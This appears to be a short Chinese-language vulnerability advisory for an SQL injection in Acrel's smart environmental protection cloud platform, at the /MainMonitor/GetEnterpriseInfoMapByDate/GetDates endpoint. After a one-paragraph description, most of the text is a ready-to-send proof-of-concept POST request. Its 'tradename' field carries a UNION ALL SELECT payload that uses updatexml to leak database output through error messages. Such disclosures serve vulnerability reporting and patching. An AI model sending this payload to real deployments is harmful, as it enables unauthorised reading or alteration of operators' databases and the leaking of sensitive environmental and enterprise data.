漏洞描述
安科瑞智能环保云平台是一款用于环境监测和管理的云平台。该漏洞存在于/MainMonitor/GetEnterpriseInfoMapByDate/GetDates接口中,攻击者可以通过构造恶意的SQL语句注入到接口参数中,进而获取数据库信息或对数据库进行未授权操作,可能导致敏感信息泄露或数据篡改。
安科瑞-智能环保云平台 /MainMonitor/GetEnterpriseInfoMapByDate/GetDates SQL 注入漏洞
PoC代码
POST /MainMonitor/GetEnterpriseInfoMapByDate/GetDates HTTPS/1.1
Host:
Content-Type: application/x-www-form-urlencoded
DeviceId=1&tradename=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,updatexml(1,concat(0x7e,CHAR(97,115,100,97,115,100,97,115,99,115,104),0x7e),1),NULL,NULL,NULL,NULL,NULL#